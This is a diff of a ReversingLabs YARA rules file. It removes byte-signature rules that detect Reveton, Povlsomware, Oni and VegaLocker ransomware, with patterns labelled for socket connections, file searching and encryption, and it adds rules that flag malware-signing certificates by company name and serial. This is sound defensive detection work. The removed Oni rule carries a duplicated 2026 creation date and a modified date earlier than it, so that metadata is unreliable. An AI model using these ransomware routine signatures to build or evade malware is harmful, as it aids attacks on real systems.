+rule REVERSINGLABS_Cert_Blocklist_0B7279068Beb15Ffe8060D2C56153C35 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects Reveton ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "14446b94-cd57-5930-b0af-b21091b61f68"
-		date = "2020-06-26"
-		modified = "2020-07-15"
+		id = "78bfa550-d85e-5776-a65d-ff0039abd2c4"
+		date = "2020-08-05"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.Reveton.yara#L1-L118"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L16320-L16336"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "2d316c558cdb5591788ef89c6e20327882a118f2928f4a31fb5b8b3083931ac5"
+		logic_hash = "ca00f1adacd6ff16e54b85be38c3a4545a10c76548e0647f7f3f6cfa4dff412d"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "Reveton"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$http_connection_1 = {
-            C6 45 ?? ?? 6A ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 45 ?? 83 7D ??
-            ?? 0F 84 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 8B C3 E8 ?? ?? ?? ?? 50 8B 45
-            ?? 50 E8 ?? ?? ?? ?? 8B D8 85 DB 74 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 45 ?? 33 C0
-            55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 8B 06 E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 45 ?? 50 68
-            ?? ?? ?? ?? 8B 45 ?? 50 53 E8 ?? ?? ?? ?? 8B 55 ?? 8B 06 8B 4D ?? E8 ?? ?? ?? ?? 83
-            7D ?? ?? 75 ?? 53 E8 ?? ?? ?? ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8B 45 ?? E8
-            ?? ?? ?? ?? C3 E9 ?? ?? ?? ?? EB ?? 8B 45 ?? 50 E8
-        }
-		$raw_socket_connection_1_1 = {
-            55 8B EC 81 C4 ?? ?? ?? ?? 53 56 57 33 C9 89 8D ?? ?? ?? ?? 89 8D ?? ?? ?? ?? 89 4D
-            ?? 89 55 ?? 8B F0 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 33 DB 8D 45 ?? BA ?? ??
-            ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 68 ?? ??
-            ?? ?? 8D 85 ?? ?? ?? ?? 50 56 E8 ?? ?? ?? ?? 8B F8 85 FF 0F 8E ?? ?? ?? ?? 8D 85 ??
-            ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8B CF E8
-            ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8
-        }
-		$raw_socket_connection_1_2 = {
-            C6 85 ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? 80 BD ?? ?? ?? ?? ?? 75 ?? 80 BD ?? ?? ??
-            ?? ?? 74 ?? 33 C0 EB ?? B0 ?? 84 C0 75 ?? C6 85 ?? ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ??
-            ?? 8D 95 ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 55 ?? 8B C6 E8 ?? ?? ?? ?? E9
-            ?? ?? ?? ?? 8A 85 ?? ?? ?? ?? FE C8 0F 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 66 C7 85 ?? ?? ?? ?? ?? ?? 8A 85 ?? ?? ?? ?? FE C8 74 ?? 2C ?? 74
-            ?? E9 ?? ?? ?? ?? 8A 85 ?? ?? ?? ?? 88 85 ?? ?? ?? ?? 8A 85 ?? ?? ?? ?? 88 85 ?? ??
-            ?? ?? 8A 85 ?? ?? ?? ?? 88 85 ?? ?? ?? ?? 8A 85 ?? ?? ?? ?? 88 85 ?? ?? ?? ?? 8A 95
-            ?? ?? ?? ?? 8A 85 ?? ?? ?? ?? E8
-        }
-		$raw_socket_connection_1_3 = {
-            66 89 85 ?? ?? ?? ?? E9 ?? ?? ?? ?? 0F B6 BD ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8D 85
-            ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B CF
-            BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 85
-            C0 75 ?? C6 85 ?? ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? B9 ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 8B 55 ?? 8B C6 E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 40 ?? 8B 00 8B 00
-            89 85 ?? ?? ?? ?? 8A 94 3D ?? ?? ?? ?? 8A 84 3D ?? ?? ?? ?? E8 ?? ?? ?? ?? 66 89 85
-            ?? ?? ?? ?? EB ?? C6 85 ?? ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? B9
-            ?? ?? ?? ?? E8
-        }
-		$raw_socket_connection_1_4 = {
-            8B 55 ?? 8B C6 E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 6A ?? 8D 85 ?? ?? ?? ?? 50 8B 45 ?? 8B
-            00 50 E8 ?? ?? ?? ?? 40 75 ?? C6 85 ?? ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? 8D 95 ??
-            ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 55 ?? 8B C6 E8 ?? ?? ?? ?? 8B 45 ?? 8B 00
-            50 E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? C7
-            45 ?? ?? ?? ?? ?? 8D 45 ?? 50 8D 85 ?? ?? ?? ?? 50 8B 45 ?? 8B 00 50 E8
-        }
-		$raw_socket_connection_1_5 = {
-            C6 85 ?? ?? ?? ?? ?? 8A 85 ?? ?? ?? ?? 88 85 ?? ?? ?? ?? 8A 85 ?? ?? ?? ?? 88 85 ??
-            ?? ?? ?? 8A 85 ?? ?? ?? ?? 88 85 ?? ?? ?? ?? 8A 85 ?? ?? ?? ?? 88 85 ?? ?? ?? ?? 66
-            8B 85 ?? ?? ?? ?? 8B D0 66 81 E2 ?? ?? 88 95 ?? ?? ?? ?? 0F B7 C0 C1 E8 ?? 88 85 ??
-            ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8D 85 ??
-            ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 6A ?? 8D 85 ?? ?? ?? ?? 50 56 E8 ?? ??
-            ?? ?? 40 74 ?? B3 ?? EB ?? C6 85 ?? ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? 8D 95 ?? ??
-            ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 55 ?? 8B C6 E8 ?? ?? ?? ?? 33 C0 5A 59 59 64
-            89 10 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 ?? E8 ??
-            ?? ?? ?? C3
-        }
-		$file_search_1_1 = {
-            55 8B EC 81 C4 ?? ?? ?? ?? 53 56 57 89 55 ?? 89 45 ?? 8B 45 ?? 89 45 ?? 68 ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 8B F0 85 F6 74 ?? 68 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 89 C3 85 DB 74
-            ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8B 45 ?? 50 FF D3 85 C0 74 ?? 8B 45 ?? 50 8D
-            85 ?? ?? ?? ?? 50 8B 45 ?? 50 E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 45 ?? 80 38 ?? 75 ??
-            8B 45 ?? 80 78 ?? ?? 0F 85 ?? ?? ?? ?? 8B 45 ?? 83 C0 ?? E8
-        }
-		$file_search_1_2 = {
-            8B F0 80 3E ?? 0F 84 ?? ?? ?? ?? 8D 46 ?? E8 ?? ?? ?? ?? 8B F0 80 3E ?? 0F 84 ?? ??
-            ?? ?? EB ?? 8B 75 ?? 83 C6 ?? 8B DE 2B 5D ?? 8D 43 ?? 50 8B 45 ?? 50 8D 85 ?? ?? ??
-            ?? 50 E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8D 46 ?? E8 ?? ?? ?? ?? 8B F8 8B C7 2B C6 8B D0
-            03 D3 42 81 FA ?? ?? ?? ?? 0F 8F ?? ?? ?? ?? 40 50 56 8D 85 ?? ?? ?? ?? 03 C3 50 E8
-            ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8
-        }
-		$file_search_1_3 = {
-            8B F0 83 FE ?? 74 ?? 56 E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8D 53 ??
-            03 C2 40 3D ?? ?? ?? ?? 7F ?? C6 84 1D ?? ?? ?? ?? ?? B8 ?? ?? ?? ?? 2B C3 48 50 8D
-            85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 03 C3 40 50 E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50
-            E8 ?? ?? ?? ?? 40 03 D8 8B F7 80 3E ?? 0F 85 ?? ?? ?? ?? 8B 45 ?? 50 8D 85 ?? ?? ??
-            ?? 50 8B 45 ?? 50 E8 ?? ?? ?? ?? 8B 45 ?? 5F 5E 5B 8B E5 5D C3
-        }
-		$raw_socket_connection_2 = {
-            55 8B EC 83 C4 ?? 53 56 8B F2 89 45 ?? 8B 45 ?? E8 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ??
-            ?? 64 FF 30 64 89 20 6A ?? 6A ?? 6A ?? E8 ?? ?? ?? ?? 8B D8 83 FB ?? 74 ?? 8D 45 ??
-            33 C9 BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 66 C7 45 ?? ?? ?? 8B C6 86 E0 66 89 45 ?? 8B 45
-            ?? E8 ?? ?? ?? ?? 89 45 ?? 6A ?? 8D 45 ?? 50 53 E8 ?? ?? ?? ?? 85 C0 74 ?? 8B C3 E8
-            ?? ?? ?? ?? 83 CB ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ??
-            C3
-        }
+	condition:
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Guangzhou YuanLuo Technology Co.,Ltd" and pe.signatures [ i ] . serial == "0b:72:79:06:8b:eb:15:ff:e8:06:0d:2c:56:15:3c:35" and 1350864000 <= pe.signatures [ i ] . not_after )
+}
+
+rule REVERSINGLABS_Cert_Blocklist_0Bc0F18Da36702E302Db170D91Dc9202 : INFO FILE
+{
+	meta:
+		description = "Certificate used for digitally signing malware."
+		author = "ReversingLabs"
+		id = "977d9686-d811-5416-b090-d4f45d7935d0"
+		date = "2020-08-05"
+		modified = "2023-11-08"
+		reference = "ReversingLabs"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L16338-L16354"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
+		logic_hash = "d9ee2cf63a4edb28f894ea49a5b4df9b818d5764d9a74721b1d5222f53859462"
+		score = 75
+		quality = 90
+		tags = "INFO, FILE"
+		status = "RELEASED"
+		sharing = "TLP:WHITE"
+		category = "INFO"
+		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( ( $http_connection_1 and $file_search_1_1 and $file_search_1_2 and $file_search_1_3 and $raw_socket_connection_1_1 and $raw_socket_connection_1_2 and $raw_socket_connection_1_3 and $raw_socket_connection_1_4 and $raw_socket_connection_1_5 ) or ( $raw_socket_connection_2 and $file_search_1_1 and $file_search_1_2 and $file_search_1_3 ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Foresee Consulting Inc." and pe.signatures [ i ] . serial == "0b:c0:f1:8d:a3:67:02:e3:02:db:17:0d:91:dc:92:02" and 1637712000 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Bytecode_MSIL_Ransomware_Povlsomware : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_Ca9B6F49B8B41204A174C751C73Dc393 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects Povlsomware ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "317d7cca-4fe8-55ab-8f5f-e42be727ec26"
-		date = "2021-08-12"
-		modified = "2021-08-12"
+		id = "d09658e4-44e4-5c10-a866-ba486000f1b6"
+		date = "2020-08-05"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/ByteCode.MSIL.Ransomware.Povlsomware.yara#L1-L64"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L16356-L16374"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "465dc1b1d7e9eb3091f36efb51029cd3383d05ece054e814b18f379e58c7e457"
+		logic_hash = "0b6558a7a1b78d471aaadced959ba91e411df50e3cc08e447fe9bd97f9e5cced"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "Povlsomware"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$setup_attack = {
-            7E ?? ?? ?? ?? 25 2D ?? 26 7E ?? ?? ?? ?? FE 06 ?? ?? ?? ?? 73 ?? ?? ?? ?? 25 80 ?? ??
-            ?? ?? 73 ?? ?? ?? ?? 0A 06 6F ?? ?? ?? ?? 00 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 0B 07 2C ??
-            00 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 8E 69 80 ?? ?? ?? ?? 00 7E ?? ?? ?? ?? 28 ?? ?? ?? ??
-            0C 16 0D 2B ?? 08 09 9A 13 ?? 00 7E ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? 00 00 09 17 58 0D
-            09 08 8E 69 32 ?? 00 38 ?? ?? ?? ?? 00 7E ?? ?? ?? ?? 25 2D ?? 26 7E ?? ?? ?? ?? FE 06
-            ?? ?? ?? ?? 73 ?? ?? ?? ?? 25 80 ?? ?? ?? ?? 73 ?? ?? ?? ?? 13 ?? 11 ?? 1A 6F ?? ?? ??
-            ?? 00 11 ?? 6F ?? ?? ?? ?? 00 11 ?? 6F ?? ?? ?? ?? 00 00 7E ?? ?? ?? ?? 6F ?? ?? ?? ??
-            13 ?? 2B ?? 12 ?? 28 ?? ?? ?? ?? 13 ?? 00 00 11 ?? 28 ?? ?? ?? ?? 00 00 DE ?? 26 00 00
-            DE ?? 00 12 ?? 28 ?? ?? ?? ?? 2D ?? DE ?? 12 ?? FE 16 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 DC
-            28 ?? ?? ?? ?? 00 00 28 ?? ?? ?? ?? 00 28 ?? ?? ?? ?? 00 2A
-        }
-		$find_files = {
-            02 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 7E ?? ?? ?? ?? 25 2D ?? 26 7E ?? ?? ?? ?? FE 06 ?? ??
-            ?? ?? 73 ?? ?? ?? ?? 25 80 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0A 00 06 6F ?? ?? ?? ?? 0C 2B ??
-            08 6F ?? ?? ?? ?? 0D 00 7E ?? ?? ?? ?? 09 6F ?? ?? ?? ?? 00 00 08 6F ?? ?? ?? ?? 2D ??
-            DE ?? 08 2C ?? 08 6F ?? ?? ?? ?? 00 DC 02 28 ?? ?? ?? ?? 0B 00 07 13 ?? 16 13 ?? 38 ??
-            ?? ?? ?? 11 ?? 11 ?? 9A 13 ?? 00 11 ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 11 ?? 72 ??
-            ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 11 ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 11 ?? 72 ?? ??
-            ?? ?? 6F ?? ?? ?? ?? 2D ?? 11 ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 11 ?? 72 ?? ?? ??
-            ?? 6F ?? ?? ?? ?? 2D ?? 11 ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 11 ?? 72 ?? ?? ?? ??
-            6F ?? ?? ?? ?? 16 FE 01 2B ?? 16 13 ?? 11 ?? 2C ?? 00 11 ?? 03 28 ?? ?? ?? ?? 00 00 00
-            DE ?? 26 00 00 DE ?? 11 ?? 17 58 13 ?? 11 ?? 11 ?? 8E 69 3F ?? ?? ?? ?? 2A
-        }
-		$encrypt_files = {
-            00 02 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 0A 06 2C ?? 2B ?? 02 28 ?? ?? ?? ?? 6F ?? ?? ?? ??
-            6F ?? ?? ?? ?? 0B 07 2C ?? 2B ?? 02 28 ?? ?? ?? ?? 00 02 02 72 ?? ?? ?? ?? 28 ?? ?? ??
-            ?? 28 ?? ?? ?? ?? 00 7E ?? ?? ?? ?? 17 58 80 ?? ?? ?? ?? 7E ?? ?? ?? ?? 02 6F ?? ?? ??
-            ?? 00 7E ?? ?? ?? ?? 02 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 00 2A
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( $setup_attack ) and ( $find_files ) and ( $encrypt_files )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "CodeDance Ltd" and ( pe.signatures [ i ] . serial == "00:ca:9b:6f:49:b8:b4:12:04:a1:74:c7:51:c7:3d:c3:93" or pe.signatures [ i ] . serial == "ca:9b:6f:49:b8:b4:12:04:a1:74:c7:51:c7:3d:c3:93" ) and 1654646400 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_ONI : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_Aaf65B8E7A2E68Bc8C9E8F27331B795C : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects Oni ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "9190aee2-1119-546e-82ca-a7aba44a9d7f"
-		date = "2026-02-22"
-		date = "2026-02-22"
-		modified = "2020-12-07"
+		id = "ccb36b8b-301d-5cc2-9c8e-4956b92c1116"
+		date = "2020-08-05"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.Oni.yara#L1-L82"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L16376-L16394"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "685abf5a5edba5bae19faaf6521ce617370cdab1404fe84d846e82a60182dfff"
+		logic_hash = "390d074da09d8e5b4bb2a6f4157a5125474ab5c22de62729d4fc4075edade289"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$find_files = {
-            8A 10 3A 11 75 ?? 84 D2 74 ?? 8A 50 ?? 3A 51 ?? 75 ?? 83 C0 ?? 83 C1 ?? 84 D2 75 ??
-            33 C0 EB ?? 1B C0 83 C8 ?? 85 C0 0F 84 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8D 85 ?? ?? ?? ??
-            8A 10 3A 11 75 ?? 84 D2 74 ?? 8A 50 ?? 3A 51 ?? 75 ?? 83 C0 ?? 83 C1 ?? 84 D2 75 ??
-            33 C0 EB ?? 1B C0 83 C8 ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ??
-            ?? 53 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? F6 85 ?? ?? ?? ??
-            ?? 0F 84 ?? ?? ?? ?? 83 EC ?? 8B D4 C7 42 ?? ?? ?? ?? ?? C7 42 ?? ?? ?? ?? ?? C6 02
-            ?? 80 BD ?? ?? ?? ?? ?? 75 ?? 33 C9 EB ?? 8D 8D ?? ?? ?? ?? 8D 71 ?? 90 8A 01 41 84
-            C0 75 ?? 2B CE 51 8D 85 ?? ?? ?? ?? 8B CA 50 E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ??
-            84 C0 74 ?? 83 EC ?? 8D 45 ?? 8B CC 6A ?? 6A ?? C7 41 ?? ?? ?? ?? ?? C7 41 ?? ?? ??
-            ?? ?? 50 C6 01 ?? E8 ?? ?? ?? ?? 83 EC ?? 8D 45 ?? 8B CC 6A ?? 6A ?? C7 41 ?? ?? ??
-            ?? ?? C7 41 ?? ?? ?? ?? ?? 50 C6 01 ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ??
-            ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 50 57 FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 57 FF
-            15 ?? ?? ?? ?? 8B 45 ?? 83 F8 ?? 72 ?? 8B 4D ?? 40 3D ?? ?? ?? ?? 72 ?? F6 C1 ?? 75
-            ?? 8B 41 ?? 3B C1 73 ?? 2B C8 83 F9 ?? 72 ?? 83 F9 ?? 77 ?? 8B C8 51 E8 ?? ?? ?? ??
-            83 C4 ?? 8B 45 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? 83 F8 ?? 72
-            ?? 8B 4D ?? 40 3D ?? ?? ?? ?? 72 ?? F6 C1 ?? 75 ?? 8B 41 ?? 3B C1 73 ?? 2B C8 83 F9
-            ?? 72 ?? 83 F9 ?? 77 ?? 8B C8 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 4D ?? 5F 5E 33 CD 5B E8
-            ?? ?? ?? ?? 8B E5 5D C3
-        }
-		$encrypt_files = {
-            55 8B EC 83 EC ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 56 57 8B 3D ?? ?? ?? ?? 8D 45 ?? 68
-            ?? ?? ?? ?? 6A ?? 33 F6 89 55 ?? 56 56 50 89 4D ?? 89 75 ?? FF D7 85 C0 75 ?? 68 ??
-            ?? ?? ?? 6A ?? 50 50 8D 45 ?? 50 FF D7 8B 7D ?? 85 FF 0F 84 ?? ?? ?? ?? 53 8D 45 ??
-            89 75 ?? 50 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B D0 E8 ?? ?? ?? ?? 8B D8 83 C4 ?? 85
-            DB 74 ?? 8D 45 ?? 50 6A ?? 6A ?? FF 75 ?? 53 57 FF 15 ?? ?? ?? ?? 53 6A ?? FF 15 ??
-            ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B 5D ?? 85 DB 74 ?? 68 ?? ?? ?? ?? 6A ?? FF 15 ?? ??
-            ?? ?? 50 FF 15 ?? ?? ?? ?? FF 75 ?? 8B F0 56 FF 15 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ??
-            ?? ?? 68 ?? ?? ?? ?? 89 45 ?? 8D 45 ?? 50 56 6A ?? 6A ?? 6A ?? 53 FF 15 ?? ?? ?? ??
-            8B 4D ?? 85 C9 74 ?? 8B 45 ?? 89 01 53 FF 15 ?? ?? ?? ?? 6A ?? 57 FF 15 ?? ?? ?? ??
-            5B 8B 4D ?? 8B C6 5F 33 CD 5E E8 ?? ?? ?? ?? 8B E5 5D C3
-        }
-		$search_processes = {
-            6A ?? 68 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C7 84 24
-            ?? ?? ?? ?? ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ??
-            E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ??
-            ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 51 B9
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 44 24 ?? ?? 8D 84 24 ?? ?? ?? ?? FF 74 24 ?? C7 05 ??
-            ?? ?? ?? ?? ?? ?? ?? 50 8D 44 24 ?? C7 05 ?? ?? ?? ?? ?? ?? ?? ?? 50 C7 05 ?? ?? ??
-            ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? BF ?? ?? ?? ?? 8D B4 24 ?? ?? ?? ?? 83 EE ?? 4F 83 7E
-            ?? ?? 72 ?? 8B 1E 8B CE 56 E8 ?? ?? ?? ?? 8B 46 ?? 40 3D ?? ?? ?? ?? 72 ?? F6 C3 ??
-            75 ?? 8B 43 ?? 3B C3 73 ?? 2B D8 83 FB ?? 72 ?? 83 FB ?? 77 ?? 8B D8 53 E8 ?? ?? ??
-            ?? 83 C4 ?? C7 46 ?? ?? ?? ?? ?? 83 7E ?? ?? C7 46 ?? ?? ?? ?? ?? 72 ?? 8B 06 EB ??
-            8B C6 8B CE C6 00 ?? E8 ?? ?? ?? ?? 85 FF 75 ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4
-            ?? 5F 5E 5B 8B E5 5D C3 E8 ?? ?? ?? ?? CC CC CC CC CC B9 ?? ?? ?? ?? E8 ?? ?? ?? ??
-            6A ?? 68 ?? ?? ?? ?? B9 ?? ?? ?? ?? C7 05 ?? ?? ?? ?? ?? ?? ?? ?? C7 05 ?? ?? ?? ??
-            ?? ?? ?? ?? C6 05 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 C3
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( $search_processes ) and ( $find_files ) and ( $encrypt_files )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ALISA L LIMITED" and ( pe.signatures [ i ] . serial == "00:aa:f6:5b:8e:7a:2e:68:bc:8c:9e:8f:27:33:1b:79:5c" or pe.signatures [ i ] . serial == "aa:f6:5b:8e:7a:2e:68:bc:8c:9e:8f:27:33:1b:79:5c" ) and 1549324800 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Vegalocker : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_C6Ed0Efe2844Fa44Aae350C6845C3331 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects VegaLocker ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "53eec8d1-bab0-5556-92c0-1b70eb763fa5"
-		date = "2020-06-26"
-		modified = "2020-07-15"
+		id = "d748bea4-8d2b-53b2-8184-ea0972ad9199"
+		date = "2020-08-05"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
